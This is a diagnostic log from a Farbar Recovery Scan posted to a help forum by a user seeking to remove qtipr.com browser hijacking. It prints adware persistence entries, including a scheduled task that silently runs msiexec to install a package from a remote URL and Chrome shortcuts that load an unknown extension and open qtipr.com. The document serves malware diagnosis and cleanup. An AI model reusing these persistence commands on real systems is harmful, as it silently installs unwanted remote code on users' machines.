      Task: {344C8415-CA09-407F-8FF8-84D4CD2C13A3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
      Task: {43437870-9096-4F74-80ED-019E32A7F3BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
      Task: {47442698-0AAA-4E9A-A3AC-3A9E147223AC} - System32\Tasks\{684F9C00-69E1-4E4F-A3A8-D8458EF013E4} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\core\PDApp.exe" -c --appletID="DWA_UI" --appletVersion="2.0" --mode="Uninstall" --mediaSignature="{7176B973-6011-43C1-AEBC-2D73FE7C6982}"
      Task: {4817D863-8B62-47C7-877F-68E7227E9AC6} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-01-11] (Microsoft Corporation)
      Task: {564C1713-0A11-4F56-81BD-C68602FDCB00} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-14] (Google Inc.)
      Task: {69FAD12E-853A-492A-AEB2-B9770FA046D5} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-1830392043-3884525579-1098650476-1002
      Task: {6D0789F1-3F20-4BE9-8967-1F7E248D59F1} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe [2017-01-11] (Adobe Systems Incorporated)
      Task: {6D514D6E-A32C-4959-BE41-0A25EBED43EC} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-14] (Google Inc.)
      Task: {6E05C25A-BCD4-4F68-B544-63A3E24ACB14} - System32\Tasks\GridinSoft Anti-Malware => C:\Program Files\GridinSoft Anti-Malware\gsam.exe
      Task: {6E500308-B0C6-442D-851B-25AF2B0591E7} - System32\Tasks\HPCustParticipation HP ENVY 4500 series => C:\Program Files\HP\HP ENVY 4500 series\Bin\HPCustPartic.exe [2014-07-21] (Hewlett-Packard Development Company, LP)
      Task: {7CCF7588-053C-4E5B-A106-FFB407225B4B} - System32\Tasks\PDVDServ Task => C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.EXE [2013-03-08] (CyberLink Corp.)
      Task: {7D5E4006-92CA-4FCD-8AEA-6F0528191076} - System32\Tasks\{A3A11742-19D9-4049-A5BB-5120CE25D095} => pcalua.exe -a "C:\Users\Alberto\Programas\CUBASE SC5\PLUGINS VST\MASTERING\YAMAHA FINAL MASTER\Final.Master.VST.Plugin.v1.0 WORKING\Setup.exe" -d "C:\Users\Alberto\Programas\CUBASE SC5\PLUGINS VST\MASTERING\YAMAHA FINAL MASTER\Final.Master.VST.Plugin.v1.0 WORKING"
      Task: {88F60BAF-1924-475E-A734-6784040F51E0} - System32\Tasks\[email protected] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
      Task: {8FEB47DB-6AF4-43E4-82EC-A450E7786342} - System32\Tasks\Erwushprazase Configuration => C:\Program Files (x86)\Eceent\clacay.exe
      Task: {A2E41054-2375-4D39-A6E0-3D25F04BAD6B} - System32\Tasks\{78EF23FA-0C21-4663-BD98-DFF09324C3AF} => pcalua.exe -a "C:\Program Files (x86)\Atari\RollerCoaster Tycoon 3 Platinum\RCT3plus.exe" -d "C:\Program Files (x86)\Atari\RollerCoaster Tycoon 3 Platinum"
      Task: {A8BE2E1C-85B0-4662-8D41-42B9A2F5D2B6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
      Task: {C247449E-399B-454A-A5D9-7894986158E8} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
      Task: {C7477296-FEB9-4980-8829-2A177E1192EE} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-01-11] (Adobe Systems Incorporated)
      Task: {CA9DC688-14FC-4374-8E45-0267757F1E04} - System32\Tasks\Lenovo\Dependency Package Auto Update => C:\Program Files\Lenovo\iMController\AutoUpdate.exe [2015-12-14] ()
      Task: {D320554E-B18B-4FFF-B72A-B362A736A32D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
      Task: {D6B27619-ED57-41A6-B563-28F9588E867B} - System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => pcalua.exe -a "C:\Program Files (x86)\ItVffRpktW\uninstall.exe"
      Task: {E10613C2-CD91-4CE6-B256-74479A195DB3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
      Task: {EF46272C-91A2-4AE7-B9FD-68453CF46DD7} - System32\Tasks\Chevuge => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S30YJ9AF353546&v=201729 /q

      (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

      Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe
      Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
      Task: C:\WINDOWS\Tasks\HPCeeScheduleForAlberto.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

      ==================== Shortcuts =============================

      (The entries could be listed to be restored or removed.)

      WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION

      Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) <===== Cyrillic

      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/

      ==================== Loaded Modules (Whitelisted) ==============

      2014-09-17 01:56 - 2014-07-02 18:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
      2012-12-24 05:53 - 2012-12-24 05:53 - 00129024 _____ () C:\WINDOWS\System32\HPCP1020LM.DLL
      2017-02-10 15:18 - 2014-01-06 14:56 - 00079872 _____ () C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe
      2017-02-15 23:44 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
      2017-02-15 23:44 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
      2017-02-15 23:44 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
      2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
      2014-05-09 14:39 - 2010-10-26 04:40 - 00049056 _____ () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
      2017-02-08 02:53 - 2017-02-08 02:53 - 00073728 _____ () C:\Program Files\CCleaner\lang\lang-1034.dll
      2016-10-25 09:57 - 2016-10-25 09:57 - 31723696 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
      2017-02-14 23:10 - 2017-02-01 09:47 - 02459992 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll
      2017-02-14 23:10 - 2017-02-01 09:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll
      2016-12-02 01:54 - 2016-12-02 01:54 - 00118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
      2016-12-02 01:54 - 2016-12-02 01:54 - 00223232 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
      2016-12-02 01:54 - 2016-12-02 01:54 - 00117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
      2016-12-02 01:54 - 2016-12-02 01:54 - 00124928 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
      2016-12-09 15:09 - 2016-12-09 15:09 - 00099416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
      2016-12-02 01:54 - 2016-12-02 01:54 - 00086528 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node
      2016-10-10 23:15 - 2016-10-10 23:15 - 00118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\fs-ext\build\Release\fs-ext.node
      2016-10-10 23:15 - 2016-10-10 23:15 - 00117760 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\ref\build\Release\binding.node
      2016-10-10 23:15 - 2016-10-10 23:15 - 00125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\ffi\build\Release\ffi_bindings.node
      2016-10-10 23:17 - 2016-10-10 23:17 - 00223232 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
      2016-12-09 15:02 - 2016-12-09 15:02 - 00099416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
      2016-10-10 23:14 - 2016-10-10 23:14 - 00121856 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\bufferutil\build\Release\bufferutil.node
      2016-10-10 23:14 - 2016-10-10 23:14 - 00166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\idle-gc\build\Release\idle-gc.node
      2014-05-09 14:30 - 2013-09-16 19:20 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

      ======================

    5. #5
      User Darkor's avatar
      Registered
      Oct 2006
      Location
      Spain
      Posts
      9

      Re: Remove qtipr.com

      Remaining part of the Farbar Recovery Addition file, which I could not paste in full together with the previous one.

      ==================== Alternate Data Streams (Whitelisted) =========

      (If an entry is included in the fixlist, only the ADS will be removed.)

      AlternateDataStreams: C:\Windows:nlsPreferences [386]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [80850]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [364744]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1176354]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Archivos temporales de Internet:G7RosvZLTjKjBQvoMJUig [2252]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]

      ==================== Safe Mode (Whitelisted) ===================

      (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

      HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
      HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
      HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
      HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""

      ==================== Association (Whitelisted) ===============

      (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


      ==================== Internet Explorer trusted/restricted ===============

      (If an entry is included in the fixlist, it will be removed from the registry.)


      ==================== Hosts content: ==========================

      (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

      2013-08-22 13:25 - 2017-02-15 23:44 - 00000124 ___RA C:\WINDOWS\system32\Drivers\etc\hosts

      127.0.0.1 localhost
      127.0.0.1 telemetry.malwarebytes.com
      127.0.0.1 skipittok.com
      0.0.0.0 keystone.mwbsys.com

      ==================== Other Areas ============================

      (Currently there is no automatic fix for this section.)

      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Alberto\Pictures\rcLoRekAi.jpg
      DNS Servers: 212.40.224.73 - 62.42.230.24
      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: )
      Windows Firewall is enabled.

      ==================== MSCONFIG/TASK MANAGER disabled items ==

      HKLM\...\StartupApproved\Run: => "OnekeyStudio"
      HKLM\...\StartupApproved\Run: => "BtServer"
      HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
      HKLM\...\StartupApproved\Run32: => "SwitchBoard"
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\StartupApproved\StartupFolder: => "Enviar a OneNote.lnk"
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\StartupApproved\StartupFolder: => "Adobe Gamma.lnk"

      ==================== FirewallRules (Whitelisted) ===============

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
      FirewallRules: [{64A4AA39-85E2-4310-A700-6DF0286EFA48}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
      FirewallRules: [{5677BB30-EA31-4265-B842-B0BF4D04936B}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
      FirewallRules: [{85B30AF4-F506-440D-97AF-79CE07E539FD}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD Cinema\PowerDVDCinema10.exe
      FirewallRules: [{B2B85FDB-E8E9-44C9-B503-0E4DD98A5591}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD10.EXE
      FirewallRules: [TCP Query User{904C3AB0-00BA-44C8-B3B2-2584455525A8}C:\world of warcraft\wow-x.x.x.x-4.0.0.12911-eu-downloader.exe] => (Allow) C:\world of warcraft\wow-x.x.x.x-4.0.0.12911-eu-downloader.exe
      FirewallRules: [UDP Query User{797AFBE0-6FE5-4B4D-B466-8FFE917F1C15}C:\world of warcraft\wow-x.x.x.x-4.0.0.12911-eu-downloader.exe] => (Allow) C:\world of warcraft\wow-x.x.x.x-4.0.0.12911-eu-downloader.exe
      FirewallRules: [{43E29B88-652F-4CA1-8602-413AE952DE07}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
      FirewallRules: [{78D82B1B-871A-42D1-B56A-33D765EC5961}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
      FirewallRules: [{034296EE-CD83-43F7-A268-C1FB2295A489}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      FirewallRules: [{D6FB44FA-C261-4B86-8A9C-532726E9E10B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      FirewallRules: [{3F83E220-447C-4E0A-8533-D0BA48370B11}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
      FirewallRules: [{BF1B9B23-4C45-4565-8CA9-793D406855B0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
      FirewallRules: [{85B767D6-5D31-4CF2-804F-E5BF553C785E}] => (Allow) C:\World of Warcraft\Launcher.exe
      FirewallRules: [{4E98F772-D3A3-4978-8B8D-D9FC5B6EB516}] => (Allow) C:\World of Warcraft\Launcher.exe
      FirewallRules: [{52372B4E-13E7-4079-8AD1-E55243FB8D08}] => (Allow) C:\World of Warcraft\Launcher.patch.exe
      FirewallRules: [{4079FA84-365B-4B42-9718-F4EF043524A6}] => (Allow) C:\World of Warcraft\Launcher.patch.exe
      FirewallRules: [TCP Query User{78284271-4D36-4B2F-B21B-4A9A4670D6DB}C:\world of warcraft\temp\wow-4.3-5.0.15890-enus-downloader.exe] => (Allow) C:\world of warcraft\temp\wow-4.3-5.0.15890-enus-downloader.exe
      FirewallRules: [UDP Query User{2E52AA23-E327-4E4B-B38A-2441DF52BD01}C:\world of warcraft\temp\wow-4.3-5.0.15890-enus-downloader.exe] => (Allow) C:\world of warcraft\temp\wow-4.3-5.0.15890-enus-downloader.exe
      FirewallRules: [{FC928487-2F84-4FC0-90CC-8A970599EFA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
      FirewallRules: [{97FA964A-83D2-43DE-A0BA-AF65E0DF6355}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
      FirewallRules: [{2860A868-0827-4974-B2FC-58C76F95B34D}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
      FirewallRules: [{F5AB4D5F-5153-4BCE-8DB6-DAD438D0F10C}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
      FirewallRules: [{337A7EC8-EAD5-4279-A556-DB73366948F4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
      FirewallRules: [{D10E51D4-A555-4AAD-9F4D-DCB43175F38E}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
      FirewallRules: [{6433BF4C-1195-46E2-BB98-86D2005FB7E8}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
      FirewallRules: [{10EC92C5-F9B9-45EA-9BB7-0E2F864A1348}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
      FirewallRules: [{8F21AF92-5FB5-4689-8A9B-61C945693EB8}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
      FirewallRules: [{650570A2-2D4C-4506-994F-418EC3D0583C}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
      FirewallRules: [{85D9A4C4-CAEE-4A77-8B65-B12E31779FB7}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
      FirewallRules: [{41930DD1-0134-4150-8D71-C2C2DF60657E}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
      FirewallRules: [{65FBCCB4-26E2-45AD-810B-020758E80C1A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3507\Agent.exe
      FirewallRules: [{11904EF8-519D-4299-AAA4-FA0F942D231F}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3507\Agent.exe
      FirewallRules: [{FFA77008-8426-4161-AA37-DDF96EF3F39A}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
      FirewallRules: [{E0B68185-3699-48F0-AAA5-F4D03D3818CF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
      FirewallRules: [{389B8FA3-528E-4023-8854-290F7F0FE798}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
      FirewallRules: [{DC8A11B8-64A0-4619-85E6-22014B397872}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3632\Agent.exe
      FirewallRules: [{0C75ABAA-5FAF-44FA-B03A-F1D400F046E0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3632\Agent.exe
      FirewallRules: [{EB46A59D-FC80-4D2A-8FBF-D69A3A9E8B84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
      FirewallRules: [{0E747BAC-E286-4EF0-B544-AE4DE501BD4A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
      FirewallRules: [TCP Query User{4897905E-A253-4634-B6D9-83EE825129ED}C:\users\alberto\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\alberto\appdata\roaming\bittorrent\bittorrent.exe
      FirewallRules: [UDP Query User{ECE83033-BD6B-467B-A05F-ED3D969E0A9C}C:\users\alberto\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\alberto\appdata\roaming\bittorrent\bittorrent.exe
      FirewallRules: [{907CA573-9707-4AC8-BB65-0632C5BFDA62}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
      FirewallRules: [{FE313894-CFAE-4802-8C1C-74F52956B415}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
      FirewallRules: [{6F4E3B31-F662-42CD-9AF7-758C26A6EAD0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
      FirewallRules: [{1FEC1A43-E809-40BB-B729-3498362A1226}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
      FirewallRules: [{AD37EAE3-EC20-46A5-BA62-BB0048BD5913}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
      FirewallRules: [{13114819-8C38-46CB-9800-647E28675B29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
      FirewallRules: [{16979F78-B814-4214-828A-B94B1747E785}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
      FirewallRules: [{8F0CDB27-8A11-4F97-96AA-402BC5C09357}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
      FirewallRules: [{DEC63037-C032-4982-898F-B0095592CAC8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
      FirewallRules: [{29244ADF-FD36-4B31-89CE-2AD05B32D07E}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{825CAB47-7635-4BED-8232-F33D4D7A8E51}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [TCP Query User{DC2B9F4C-F033-41E4-B16F-4426C7EA8888}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
      FirewallRules: [UDP Query User{A08FB56D-4D1C-469D-99EC-EAB06B89E87D}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
      FirewallRules: [{BE747823-D523-4A1B-AF7C-58CFFCED5845}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
      FirewallRules: [{240D4285-C809-4307-A00F-F1BF15118900}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
      FirewallRules: [{19A3085D-8D38-4FFA-A55C-83D5064E3903}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
      FirewallRules: [{FD3D2103-6DE9-4AAA-A0C6-321BF241FCB6}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
      FirewallRules: [{464CCC7D-1645-4727-BEBB-4819DBC6911A}] => (Allow) C:\Program Files\HP\HP ENVY 4500 series\Bin\DeviceSetup.exe
      FirewallRules: [{CB2609F7-9D79-454E-ADDF-502C61DF54B0}] => (Allow) LPort=5357
      FirewallRules: [{50576B7E-104C-45AC-8A61-6D1DC4BA5910}] => (Allow) C:\Program Files\HP\HP ENVY 4500 series\Bin\HPNetworkCommunicatorCom.exe
      FirewallRules: [{B76BC022-7433-428A-B1CA-B48B630DF5FA}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
      FirewallRules: [{4E86C36A-952A-4809-AF36-992EE0FD5A77}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
      FirewallRules: [{4055F52F-1F36-437A-8C56-BC3D4A9D93BC}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
      FirewallRules: [{96F4DC4C-5F9F-4E31-AAA3-83254DD04208}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
      FirewallRules: [{30BC4282-0BD5-4B45-B2FD-E0E8710D705D}] => (Allow) C:\Users\Alberto\AppData\Local\Temp\7zS040A\HPDiagnosticCoreUI.exe
      FirewallRules: [{40D3FF0B-E002-406F-A4C7-8F6239B9FEC2}] => (Allow) C:\Users\Alberto\AppData\Local\Temp\7zS040A\HPDiagnosticCoreUI.exe
      FirewallRules: [{F101F3A7-6D80-4131-8BEB-17A9DC48CB33}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{54E686C6-241C-425A-9D9A-E0AF5FADDC0E}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{57046DF0-E908-423A-87A2-75D5DA60C996}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{72A76DB4-4DCA-4D5B-96C9-369B62BED6E4}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{5F0D36BF-2181-4E88-BABB-8231C9B4CE6D}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{35ABF9C3-8320-4C0C-B54C-891319654FFD}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [TCP Query User{C1D51E93-92D0-46B2-A2B1-810F6B4D5117}C:\users\alberto\appdata\local\ucbrowser\user data_i18n\thunder\1.0.0.0\download\minithunderplatform.exe] => (Block) C:\users\alberto\appdata\local\ucbrowser\user data_i18n\thunder\1.0.0.0\download\minithunderplatform.exe
      FirewallRules: [UDP Query User{A2332F5B-0D09-49B1-AFAD-E70CB414EE79}C:\users\alberto\appdata\local\ucbrowser\user data_i18n\thunder\1.0.0.0\download\minithunderplatform.exe] => (Block) C:\users\alberto\appdata\local\ucbrowser\user data_i18n\thunder\1.0.0.0\download\minithunderplatform.exe
      FirewallRules: [TCP Query User{25C3E988-35BA-46E7-AF5E-451A438CDE66}C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42449.exe] => (Block) C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42449.exe
      FirewallRules: [UDP Query User{0B555522-B9F2-4662-ACC4-C469B49BA867}C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42449.exe] => (Block) C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42449.exe
      FirewallRules: [TCP Query User{07FA785C-D441-442A-B5B3-08880B90FCAB}C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42576.exe] => (Allow) C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42576.exe
      FirewallRules: [UDP Query User{4FAEBDCC-79BE-4F65-A6E3-FE1B2C4491EF}C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42576.exe] => (Allow) C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42576.exe
